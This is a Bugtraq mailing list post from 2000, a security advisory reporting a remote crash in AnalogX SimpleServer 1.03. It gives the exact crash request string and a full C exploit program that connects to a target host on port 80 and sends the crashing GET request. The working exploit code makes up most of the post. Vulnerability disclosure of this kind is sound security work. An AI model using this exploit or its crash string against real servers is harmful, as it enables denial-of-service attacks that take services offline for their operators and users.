Bugtraq mailing list archives
AnalogX SimpleServer 1.03 Remote Crash
From: presto () REGIONONLINE COM (presto chango)
Date: Sat, 25 Mar 2000 12:13:20 -0500
# [t P G] # [tPG ADVISORY] # [Author: Presto] # [Title: AnalogX SimpleServer 1.03 Remote Crash ] # [Date: Mar.23.2k ] # [Description] This problem is similar to the one USSRback.com reported on in Dec.1999 in reference to version 1.01. In that report, a 'GET' command with 1000 char buffer would cause a buffer overflow. After running the code below (which is derived from some cgi scan code), version 1.03 committed to a crash. This is one of those bugs I find trivial. Any requested file with 'GET' involved over or below 17 characters will not crash the server. The crash string below: GET /cgi-bin/tpgnrock HTTP/1.0 The server side would have recieved a message of this context: ASSERT: Pointer is NULL (..\..\EMUCORE\emu-str.c/284) I think its a problem in the c0de. (duh.) # [Code] ---start here--- /* Code ripped from a cgi scanner. I actually stumbled upon the exploit through this code. C0D3 == M3SSY. Whatever. -Presto/tPG */ #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <signal.h> #include <stdio.h> #include <string.h> #include <netdb.h> #include <ctype.h> #include <arpa/nameser.h> #include <sys/stat.h> #include <strings.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> void main(int argc, char *argv[]) { int sock; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; unsigned long start; unsigned long end; unsigned long counter; char foundmsg[] = "200"; char *cgistr; char buffer[1024]; int count=0; int numin,foreign=0; char ojsimp[20]; char *okay[2]; char *player[2]; okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n"; player[1] = "Check if its running now."; if (argc<2) { printf("\n HOSTNAME PLEASE@!# "); exit(0); } if ((he=gethostbyname(argv[1])) == NULL) { herror("gethostbyname"); exit(0); } printf("\n\n\t Crash Exploit for AnalogX SimpleServer v1.03\n\n"); start=inet_addr(argv[1]); counter=ntohl(start); sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf("\n\n HTTPD Version. \n"); getchar(); send(sock, "HEAD / HTTP/1.0\n\n",17,0); recv(sock, buffer, sizeof(buffer),0); printf("%s",buffer); close(sock); printf("\n\t Press something. \n"); getchar(); while(count++ < 2) { sock=socket(AF_INET, SOCK_STREAM, 0); bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(80); if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0) { perror("connect"); } printf(" %s : ",player[count]); for(numin=0;numin < 20;numin++) { ojsimp[numin] = '\0'; } send(sock, okay[count],strlen(okay[count]),0); recv(sock, ojsimp, sizeof(ojsimp),0); cgistr = strstr(ojsimp,foundmsg); if( cgistr != NULL) { printf("Heh.\n");++foreign; } else printf(" tPG\n"); close(sock); } if (foreign) { printf("bl3h. bl4h. h3h. w00p. 33p.\n"); } } ---End here--- # [Other Notes] AnalogX has been informed with the situation. url: http://www.analogx.com Version 1.03 on NT server 4.0 affected. No other combinations have been attempted at this point. # [EOF] http://www.tpgn.net Unscrewing your nuts and bolts. - This message was sent from: http://www.regiononline.com ! Stop by and see what's going on in YOUR region NOW!
Current thread:
- AnalogX SimpleServer 1.03 Remote Crash presto chango (Mar 25)